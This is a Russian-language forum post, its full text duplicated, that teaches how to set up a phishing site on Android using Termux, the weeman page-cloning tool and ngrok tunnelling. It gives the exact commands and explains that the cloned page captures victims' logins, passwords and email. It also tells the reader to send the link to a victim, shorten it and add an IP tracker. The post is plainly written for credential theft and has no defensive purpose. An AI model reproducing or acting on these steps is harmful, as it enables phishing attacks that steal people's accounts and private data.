Download_Link
New member
Всем привет! Сегодня я вам расскажу и покажу, как создавать фишинговые сайты в интернете на Android. Фишинговый сайт - это копия оригинального сайта, только в нее встроен "шпион", которые отправляет все введенные на ней данные владельцу фишинг странички. То-есть если кто-то введет пароль, логин, почту или иные конфиденциальные данные - вы получите их.
Сначала скачаем и установим самую новую версию "Termux":
pkg update -y pkg upgrade -y
Установим "git" и "python 2":
apt install git apt install python2
Скачаем утилиту "weeman":
git clone https://github.com/evait-security/weeman
Установка окончена! Осталось только включить данную утилиту:
Откроем директорию инструмента:
А теперь включим саму утилиту:
python2 weeman.py
Программа запущена! Для создания фишинговой странички - читайте статью дальше:
set url https://google.com
Устанавливаем URL сайта, на который перекинет жертву, после ввода данных на нашей страничке ( Полный URL ):
set action_url https://google.com
Устанавливаем порт для дальнейшей работы в "ngrok" ( На не рутированных устройствах - только "8080" ) :
set port 8080
Чекаем настройки фишинг странички и запускаем сайт:
show
run
После того, как наша утилита скачала сайт и запустилась в локальной сети нашего устройства - нам нужно установить и настроить "ngrok", чтобы в дальнейшем мы смогли дать ссылку на нашу страничку жертве.
Откроем новую сессию "termux":
Установим "ngrok":
apt update apt upgrade
apt install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
( После ввода последней команды - нужно ввести букву "y" для соглашение с установкой "ngrok" )
Теперь нам нужно авторизоваться на сайте "ngrok" любым способом:
После авторизации нам нужно скопировать ключ нашего аккаунта ( ключ замазан на картике зеленым цветом ):
После копирования ключа - нас нужно ввести команду для активации вашего аккаунта в "termux":
ngrok authtoken {ВАШ КЛЮЧ}
После данных манипуляций ваш аккаунт должен был подключится к "ngrok", который установлен на вашем устройстве.
Теперь вам нужно всего лишь ввести данную команду:
ngrok http 8080
С помощью данной команду мы открыли сайт в интернете, который работает в нашей локальной сети, то-есть у нас есть ссылка на фишинговый сайт:
Просто скопируйте одну из данных ссылок и киньте вашей жертве. После того, как жертва введет хоть какие-то данные на вашем сайте - они отобразятся в сессии, там где мы запустили утилиту "weeman". Если вам не нравится данная ссылка - ее можно сократить на любом сайте или приложении по сокращению ссылок. В данную ссылку можно еще встроить и трекер IP адресов, о котором я рассказывал в статье!
Сначала скачаем и установим самую новую версию "Termux":
pkg update -y pkg upgrade -y
Установим "git" и "python 2":
apt install git apt install python2
Скачаем утилиту "weeman":
git clone https://github.com/evait-security/weeman
Установка окончена! Осталось только включить данную утилиту:
Откроем директорию инструмента:
А теперь включим саму утилиту:
python2 weeman.py
Программа запущена! Для создания фишинговой странички - читайте статью дальше:
set url https://google.com
Устанавливаем URL сайта, на который перекинет жертву, после ввода данных на нашей страничке ( Полный URL ):
set action_url https://google.com
Устанавливаем порт для дальнейшей работы в "ngrok" ( На не рутированных устройствах - только "8080" ) :
set port 8080
Чекаем настройки фишинг странички и запускаем сайт:
show
run
После того, как наша утилита скачала сайт и запустилась в локальной сети нашего устройства - нам нужно установить и настроить "ngrok", чтобы в дальнейшем мы смогли дать ссылку на нашу страничку жертве.
Откроем новую сессию "termux":
Установим "ngrok":
apt update apt upgrade
apt install git
git clone https://github.com/tchelospy/termux-ngrok.git
cd termux-ngrok
chmod +x termux-ngrok.sh
./termux-ngrok.sh
( После ввода последней команды - нужно ввести букву "y" для соглашение с установкой "ngrok" )
Теперь нам нужно авторизоваться на сайте "ngrok" любым способом:
После авторизации нам нужно скопировать ключ нашего аккаунта ( ключ замазан на картике зеленым цветом ):
После копирования ключа - нас нужно ввести команду для активации вашего аккаунта в "termux":
ngrok authtoken {ВАШ КЛЮЧ}
После данных манипуляций ваш аккаунт должен был подключится к "ngrok", который установлен на вашем устройстве.
Теперь вам нужно всего лишь ввести данную команду:
ngrok http 8080
С помощью данной команду мы открыли сайт в интернете, который работает в нашей локальной сети, то-есть у нас есть ссылка на фишинговый сайт:
Просто скопируйте одну из данных ссылок и киньте вашей жертве. После того, как жертва введет хоть какие-то данные на вашем сайте - они отобразятся в сессии, там где мы запустили утилиту "weeman". Если вам не нравится данная ссылка - ее можно сократить на любом сайте или приложении по сокращению ссылок. В данную ссылку можно еще встроить и трекер IP адресов, о котором я рассказывал в статье!
